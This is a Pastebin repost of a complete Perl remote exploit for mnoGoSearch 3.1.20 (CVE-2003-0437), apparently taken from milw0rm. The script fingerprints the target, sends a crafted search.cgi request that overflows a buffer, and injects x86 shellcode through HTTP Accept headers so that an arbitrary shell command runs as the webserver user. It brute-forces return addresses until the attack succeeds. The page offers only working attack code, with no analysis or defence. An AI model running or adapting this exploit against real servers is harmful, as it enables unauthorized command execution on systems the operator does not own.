Advertisement
FlyFar

mnoGoSearch 3.1.20 - Remote Command Execution - CVE-2003-0437

Feb 3rd, 2024
1,415
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 4.32 KB | Cybersecurity | 0 0
  1. #!/usr/bin/perl
  2. #
  3. # [ reloaded ]
  4. # Remote Exploit for mnoGoSearch 3.1.20 that performs
  5. # remote command execution as the webserver user id
  6. # for linux ix86
  7. # by pokleyzz
  8. #
  9.  
  10. use IO::Socket;
  11.  
  12. $host = "127.0.0.1";
  13. $cmd  = "ls -la";
  14. $searchpath = "/cgi-bin/search.cgi";
  15. $rawret = 0xbfff105c;
  16. $ret = "";
  17. $suffsize = 0;
  18. $port = 80;
  19.  
  20. my $conn;
  21.  
  22.  
  23. if ($ARGV[0]){
  24.     $host = $ARGV[0];  
  25. }
  26. else {
  27.     print "[x] mnogosearch 3.1.x exploit for linux ix86 \n\tby pokleyzz\n\n";
  28.     print "Usage:\n mencari_sebuah_nama.pl host [command] [path] [port] [suff] [ret]\n";
  29.     print "\thost\thostname to exploit\n";
  30.     print "\tcommand\tcommand to execute on server\n";
  31.     print "\tpath\tpath to search.cgi default /cgi-bin/search.cgi\n";
  32.     print "\tport\tport to connect to\n";
  33.     print "\tsuff\tif not success try to use 1, 2 or 3 for suff (default is 0)\n";
  34.     print "\tret\treturn address default bfffd0d0\n";
  35.     exit;
  36. }
  37.  
  38. if ($ARGV[1]){
  39.     $cmd = $ARGV[1];   
  40. }
  41. if ($ARGV[2]){
  42.     $searchpath = $ARGV[2];
  43. }
  44. if ($ARGV[3]){
  45.     $port = int($ARGV[3]); 
  46. }
  47. if ($ARGV[4]){
  48.     $suffsize = int($ARGV[4]); 
  49. }  
  50. if ($ARGV[5]){
  51.     $rawret = hex_to_int($ARGV[5]);
  52. }
  53.  
  54. #########~~ start function ~~#########
  55. sub hex_to_int {
  56.     my $hs = $_[0];  
  57.     $int = (hex(substr($hs, 0, 2)) << 24) + (hex(substr($hs, 2, 2)) << 16) +
  58.                          (hex(substr($hs, 4, 2)) << 8) + + hex(substr($hs, 6, 2));
  59.        
  60. }
  61.  
  62. sub int_to_hex {
  63.     my $in = $_[0];
  64.     $hex = sprintf "%x",$in;
  65. }
  66.  
  67. sub string_to_ret {
  68.     my $rawret = $_[0];
  69.     if (length($rawret) != 8){
  70.         print $rawret;
  71.         die "[*] incorrect return address ...\n ";
  72.     } else {
  73.         $ret = chr(hex(substr($rawret, 2, 2)));
  74.         $ret .= chr(hex(substr($rawret, 0, 2)));
  75.         $ret .= chr(hex(substr($rawret, 6, 2)));
  76.             $ret .= chr(hex(substr($rawret, 4, 2)));
  77.            
  78.     }  
  79.    
  80. }
  81.  
  82. sub connect_to {
  83.     #print "[x] Connect to $host on port $port ...\n";
  84.     $conn = IO::Socket::INET->new (
  85.                     Proto => "tcp",
  86.                     PeerAddr => "$host",
  87.                     PeerPort => "$port",
  88.                     ) or die "[*] Can't connect to $host on port $port ...\n";
  89.     $conn-> autoflush(1);
  90. }
  91.  
  92. sub check_version {
  93.     my $result;
  94.     connect_to();
  95.     print "[x] Check if $host use correct version ...\n";
  96.     print $conn "GET $searchpath?tmplt=/test/testing123 HTTP/1.1\nHost: $host\nConnection: Close\n\n";
  97.    
  98.     # capture result              
  99.     while ($line = <$conn>) {
  100.         $result .= $line;
  101.         };
  102.    
  103.     close $conn;
  104.     if ($result =~ /_test_/){
  105.         print "[x] Correct version detected .. possibly vulnerable ...\n";
  106.     } else {
  107.         print $result;
  108.         die "[x] New version or wrong url\n";
  109.     }  
  110. }
  111.  
  112. sub exploit {
  113.     my $rw = $_[0];
  114.     $result = "";
  115.     # linux ix86 shellcode rip from phx.c by proton
  116.     $shellcode = "\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x7e\x04\x8d\x7e\x1b\x89\x7e\x08"
  117.                  ."\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x31\xc0\x88\x07\x89\x46\x0c\x88"
  118.                  ."\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  119.                  ."\x80\xe8\xc0\xff\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  120.                  ."\x41\x41"
  121.                  ."/bin/sh -c echo 'Content-Type: text/hello';echo '';"
  122.                  ."$cmd"
  123.                  ."@";
  124.     $strret = int_to_hex($rw);
  125.     $ret = string_to_ret($strret);
  126.     $envvar = 'B' x (4096 - length($shellcode));
  127.     $envvar .= $shellcode;
  128.    
  129.     # generate query string
  130.     $buffer = "B" x $suffsize;
  131.     $buffer .= "B" x 4800;
  132.     $buffer .= $ret x 200;
  133.    
  134.     $request = "GET $searchpath?ul=$buffer HTTP/1.1\n"
  135.            ."Accept: $envvar\n"
  136.            ."Accept-Language: $envvar\n"
  137.            ."Accept-Encoding: $envvar\n"
  138.            ."User-Agent: Mozilla/4.0\n"
  139.            ."Host: $host\n"
  140.            ."Connection: Close\n\n";
  141.    
  142.     &connect_to;
  143.     print "[x] Sending exploit code ..\n";
  144.     print "[x] ret: $strret\n";
  145.     print "[x] suf: $suffsize\n";
  146.     print "[x] length:",length($request),"\n";
  147.     print $conn "$request";
  148.     while ($line = <$conn>) {
  149.         $result .= $line;
  150.         };
  151.     close $conn;
  152.    
  153. }
  154.  
  155. sub check_result {
  156.     if ($result =~ /hello/ && !($result =~ /text\/html/)){
  157.         print $result;
  158.         $success = 1;
  159.     } else {
  160.         print $result;
  161.         print "[*] Failed ...\n";
  162.         $success = 0;
  163.     }
  164. }
  165. #########~~ end function ~~#########
  166.  
  167. &check_version;
  168. for ($rawret; $rawret < 0xbfffffff;$rawret += 1024){
  169.     &exploit($rawret);
  170.     &check_result;
  171.     if ($success == 1){
  172.         exit;
  173.     }
  174.     sleep 1;
  175. }
  176.  
  177. # milw0rm.com [2003-06-10]
  178.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement